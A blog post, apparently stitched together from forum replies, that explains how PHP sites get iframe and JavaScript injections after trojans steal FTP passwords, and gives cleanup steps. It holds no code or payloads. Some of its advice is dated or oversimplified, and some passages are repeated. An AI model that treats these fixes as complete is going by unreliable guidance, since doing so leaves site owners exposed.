There are several possibilities insert virus in the php website and the possibilities are as below:
Possibility : 1
Malicious code is being injected in PHP, Javascript and HTML scripts. Website users are downloading malicious code and infecting others.
When you open a website (most probably in IE) which is infected with malicious code, your browser downloads malicious code (which is a trojan/spyware) from the URL specified in the iframe tag or in the source of a script tag ( some times your browser also opens Acrobat Reader). Most of the anti-viruses don't detect this trojan, some only give a warning but don't block it. So when your computer is infected, a trojan residing in your computer steals your ftp passwords when you type them in your ftp program. Using these ftp accounts, the trojan scans all the directories on your ftp server and find files having any of following words in their name
- main
- default
- index
- home
- and all the files included at the top of index file
The trojan then injects malicious code into these files and also infects the users visiting your website.
Possibility : 2
This issue is provoked by a Windows Virus that sniffs the internet connection for user names and passwords of ftp accounts. Then it silently download every (or only index/default) files from the remote ftp to the infected Windows PC and then adds the iframe or javascript code and in the end it uploads back the files. So..first of all when removing this virus from the remote servers check your computers. The virus is known as : Trojan.Script.Iframe.
Possibility : 3
.htaccess file automatically put into my site
It got there through some vulnerability or other, most likely your computer being infected with something and the FTP. But it could be a problem with the security of your host or your scripts.
It basically redirects all requests to your site that were directed there from any of the listed sites, that doesn't have the listed words in the user agent and redirects them to the link at the bottom. Based on the expansive list I would guess it's purpose is supposed to be to hijack bots from your site.
It basically redirects all requests to your site that were directed there from any of the listed sites, that doesn't have the listed words in the user agent and redirects them to the link at the bottom. Based on the expansive list I would guess it's purpose is supposed to be to hijack bots from your site.
Possibility : 4
Some FTP clients store passwords in plain text. Some viruses search for these files and send them "home". I don't know about WinSCP -- although the protocol (SSH) is a lot safer than FTP, I think it still stores passwords in plain text. That's all I can think of right now, if you give more details maybe other ideas will pop out. Be safe.
Possibilty: 5
Virus attack injecting javascript code , malicious or iframe code into the index page
Normally, The virus attacks following files on your server:
index.php
index.html
main.php
header.php
footer.php
At the start or end of these files it will insert the iframe,
Now the forum is "clean".
In some case, this "virus" make some modification in your database system. Make sure you checked you database and removed any suspicious code.
What it does?
I can only guess. The code is calling a script on online-channels.info site. It can be sending traffic information. Maybe it is a first case of Internet marketing espionage? Or it can be trying to run some malicious code.
What it does?
He save your FTP password, acces you account, and instal in your index files, (Index from all directory) an IFRAME code that will open a virus page in your index of the forum.
How it's done ?
This is a sophisticated operation, and the infection cycle is involved, but basically, the hacker(s) are setting up innocent looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, firefox and opera). The visitor is unaware that they may have a keylogger that sends the persons passwords ect to the hacker(s) and moves on. If the innocent visitor has an ftp or root password for any internet sites, the hackers use a program that goes to the persons site(s) and instantly adds the hidden iframe to every index type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the ftp or root passwords to login. And since they have at least your account ftp pass, whatever permissions your folders and files are set to make no difference.
After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers infection site, where the person's computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked so that the number of hacked sites will grow (as they have starting in Italy) into the tens of thousands... Please don't think you can depend solely on your antivirus software to protect your computer. It more than likely won't help you. For $1000 dollars, the russian hacking bulletin boards are offering Mpack with 1 year support and a GUARANTEE that virus programs will not catch the keyloggers. SO, keep your virus program updated, but don't depend on it completely!
This way this hack is spreading fastly from one computer to another broadcasting the passwords to hackers.During my research in this, I even found some of the password files collected by the hack on some of the hacked server, where they pass this password file to thier tool to add the code. In some cases Google bots picks this files and you can even find the login details of FTP accounts and Server root login details in google.
How Do I got attacked ??
1. Your computer or a computer you use to administrate your website gets infected with a virus or trojan.
2. That virus or trojan runs a process on the computer searching FTP applications and their databases for username and password combinations or just looking for username and passwords in files on the computer.
3. When a username and password is found, that information is e-mailed, or somehow sent to an individual or a group of individuals.
4. That individual or group of individuals then have access to your account login information. They proceed to connect to your account via FTP using the hostname, username, and password that the trojan/virus provided for them.
5. Once connected to FTP on your account, they download your index page, edit that index page, place a malicious piece of javascript code or iframe code into the index page, then reupload it to your account.
6. Your website is now infected with malicious javascript or iframe code, which can then be used to infect or track other visitors of your website.
Your computer being infected with a virus is not a direct result of your website being infected with a virus, or vice-versa. It is because of the type of virus or trojan that is installed on your computer, that your login information was compromised. This compromised data is what led to your website being infected.
How you got infected (Step 1) is completely up in the air. Perhaps you downloaded a program that was infected. Perhaps you received an e-mail that caused the infection. Perhaps you visited a website that caused the infection. There's really no way to be absolutely certain of how this infection initially took place. The best thing you can do is preventive measures. Keep your anti-virus software up-to-date. Make sure the memory resident of the virus scanner stays running. Do routine virus scans on your computer just to be sure. Use anti-spyware software to keep tabs on possible trojans or key loggers that might be installed on your computer. Practice overall safe web-browsing. I recommend using only Firefox for your web browser and installing the NoScript Firefox addon to help prevent any malicious javascript from running in your browser.
All of this assumes that your account credentials were compromised due to a local virus or trojan. That may not be the case. I would bet that your credentials have been compromised in some way, but even that is not a given. Other ways for your credentials to be compromised is if you leave your username and password written down near your desk at work or at a coffee shop, if you leave it in plain view, someone else may be able to read that information and then your information is compromised. There's really no way to know exactly how the information was compromised.
It's also possible that there was no credential compromise at all. You may have an outdated script installed on your account or on your web server that allowed malicious users to gain access to your account and inject material into your website. You should always make sure that you are running the latest version of any scripts or applications you have on your website to prevent something like this from happening.
What is solution now ?
If you are facing this problem and your administrator says its only your account, just change the FTP password and it will stop
You must have removed the code as soon as it attack and change the file permission to READ ONLY or CHMODE 444 to make sure it never got attack again. Please Change the FTP Password immediately. Just changing password is not complete solution but is the first step.
Whats next, your password is leaked that means your computer is sending out the passwords, so I would suggest you to do a clean format first and then install any antivirus of spyware which you think could block it. But the best solution is to clean format the computer.
Just do the three things:
1) Change the FTP or root password of server.
2) Clean format the PC.
3) Forum cleaning.
You can download file_check.php . Put it in your root of the forum and run it from the adress http://yourforumadress.com/file_check.php .
It usually add that IFRAME code after the "?>" of the PHP code. You`ll get some pages that you need to delete the IFRAME.
Now go to the index.template.php from Themes/your theme directory. Search where the code start, and there you`ll find another IFRAME. Delete it (WARNING! Without '; from after the .).
Now the forum is "clean".
In some case, this "virus" make some modification in your database system. Make sure you checked you database and removed any suspicious code.
No comments:
Post a Comment